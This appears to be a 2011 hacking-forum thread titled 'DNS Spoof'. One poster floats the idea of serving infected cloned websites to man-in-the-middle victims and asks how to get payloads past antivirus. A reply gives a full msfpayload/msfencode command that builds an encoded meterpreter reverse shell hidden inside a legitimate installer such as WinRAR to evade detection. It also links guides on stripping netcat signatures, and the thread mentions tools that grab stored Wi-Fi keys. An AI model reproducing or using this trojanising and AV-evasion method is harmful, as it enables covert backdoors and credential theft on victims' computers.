DNS Spoof
Had a play with different scrips and thought of a possible enhancement (I dont have the skills to do this but thought I woudl share the idea)
SET and other MITM scripts generally rely on a victim going to a cloned website for a payload to be executed, how about the attacker webserver hosting a number of cloned sites, say if it could handle 1000's then the whole web from the victims point of view could be effected...
Alternativley could the webserver create cloned and infected sites on the fly, i.e. victim requests backtrack.org so the webserver constructs the site and infects with a payload?
Just a thought, if crap feel free to delete thread...
(PS dont bother coming back saying, yeah great idea looking forward to seeing the script, I have clearly stated this is an idea and that I do not have the skills)
(PPS still struggling to get payloads past AV, read various posts and links but still struggling, latest was to encode but how would I go about writing one of these?)
Re: DNS Spoof
Just inject payloads into another exe file with a big enough .text segment. For example the winrar installer should work(PPS still struggling to get payloads past AV, read various posts and links but still struggling, latest was to encode but how would I go about writing one of these?)
And first start with a bind shell or something small before trying meterpreter.
(\ /)
( . .)
c(")(")
This is bunny.
Copy and paste bunny into your signature to help him gain world domination.
Re: DNS Spoof
Had a quick play around with WINRAR and can create a sfx.exe, which seeems to extract to a folder (wouldn't this then trigger the AV?) and runs the program (I was testing with wzcook.exe which our work AV doesnt pick up as a virus but intend to try at home later with a Nirsoft WKV or a msf reverse binder).
Is this what you mean by "inject"? I though I towuld be trying to combine say netstat.exe and wzcook.exe into 1 exe, but this doesn't seem to be the case with WINRAR?
Re: DNS Spoof
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Re: DNS Spoof
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Re: DNS Spoof
msfpayload has the option to put a payload inside another exe file. That's what i ment with injecting.
This worked for me with the winrar exe and doesn't get detected by AV.Code:./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x someexe.exe -o output.exe
If you want to get netcat passed the AV, you will need to remove the filesignature.
http://www.mattszafran.co.uk/papers/...atsFileSig.pdf
http://dl.packetstormsecurity.net/pa...ack_Netcat.pdf
And I remember there's a video on the site of offensive security "I piss on your AV". You could watch that also.
http://www.offensive-security.com/resources/videos/
Last edited by LHYX1; 04-11-2011 at 05:40 PM.
(\ /)
( . .)
c(")(")
This is bunny.
Copy and paste bunny into your signature to help him gain world domination.
Posting Permissions
